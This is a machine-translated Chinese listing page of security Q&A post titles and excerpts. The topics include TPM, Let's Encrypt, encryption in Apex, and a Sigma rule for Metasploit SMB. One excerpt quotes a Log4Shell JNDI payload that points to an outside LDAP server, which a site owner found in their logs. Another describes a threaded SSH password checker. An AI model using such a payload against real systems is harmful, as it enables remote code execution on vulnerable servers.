Android 自格式化以响应启动模式
作者:Brosi_learn_fast 提问时间:10/4/2023
我正在尝试增强手机的安全性,使其具有“防篡改”功能。具体来说,我希望设备在连接到计算机时自动格式化并擦除数据。在尝试进入启动模式时触发此过程至关重要。如果您有这方面的专业知识,或者可以向我指出有价值的...
安全 问答列表
对于 TPM 1.2,使用 tpm-tools 重新启动后tpm_sealdata不起作用
作者:Dhruv Choksi 提问时间:8/22/2023
我正在尝试在 TPM 1.2 芯片中加密和存储密钥,为此我使用了 TrouSerS 提供的 tpm-tools 包。当我第一次拥有所有权时,我可以tpm_sealdata和tpm_unsealdata...
通过CloudFlare路由时如何使用let encrypt?[复制]
作者:Nicolaas Thiemen Francken 提问时间:10/4/2023
这个问题在这里已经有答案了: CloudFlare 阻止 Let's Encrypt 续订和设置 (1 个答案) 使用 Cloudflare 自动续订 certbot (2 个答案) 上个月关闭。 ...
如何在 Apex (Salesforce) 中加密/解密 AES 128、密码模式 ECB?
作者:Leandro Petri 提问时间:10/5/2023
我需要在 AES 128 中加密和解密,在 Apex 中使用密码模式 ECB 才能使用 API 我尝试使用 Crypto Class,但密码模式 ECB 被认为对 Salesforce 不安全,因此它...
网站攻击:${jndi:ldap:/93.95.216.134:1389/Exploit}
作者:Robert Benedetto 提问时间:10/5/2023
似乎有人试图攻击我的网站。我在博客中看到以下内容受到攻击:${jndi:ldap:/93.95.216.134:1389/Exploit} 似乎来自香港。 我的网站只是抛出 400 个错误,所以它...
Paramiko 和 ssh2-python3 在高线程中无法按预期工作
作者:D3F4U1T 提问时间:9/26/2023
我想创建一个SSH检查器,它使用Python检查某些服务器的用户密码。 我知道将它用于邪恶工具是非法的,但我创建它是为了研究和学习目的。(主要学习线程和安全性的细节)。 让我非常好奇的是,它对连接数...
使用 Firebase 存储 API KEYS 的最安全方式(远程配置/Firestore)
作者:MaaAn13 提问时间:10/6/2023
首先,我确实明白客户端上的任何 API KEY 都可能被盗。API KEY 用于特定的第三方后端服务。当我检测到有人窃取了API KEY时,我有办法重新生成它,但我想让人们尽可能难以窃取它。 我目前...
如何在类似哈希的匿名化函数中使用伪造者
作者:obviouslyalive 提问时间:10/7/2023
我正在寻找一个函数来使可重现的字符串匿名化。现在我专注于名称,我想要一个类似哈希的函数,它将输入名称字符串映射到唯一的输出名称。 >> anon_name('Alice Lopez') 'Grant...
尝试在笔记本电脑上运行具有一个核心数的 OWASPBWAP 时,指示灯闪烁很奇怪
作者:glitch 提问时间:10/8/2023
我试图在我的笔记本电脑上安装OSWAP-BWA。我最初从 1 开始处理器核心数。完成配置后,我尝试启动应用程序。笔记本电脑开始闪烁键盘上的 Caps Lock 指示灯,以及外部 HP 键盘上的 HP ...
Metasploit SMB 身份验证
作者:Roozbeh Ramezani 提问时间:10/8/2023
我在我的业务中实施了以下 sigma 规则 当根据此 sigma 规则生成警报时 ((NOT exists:data.win.eventdata.processName AND data.id:“47...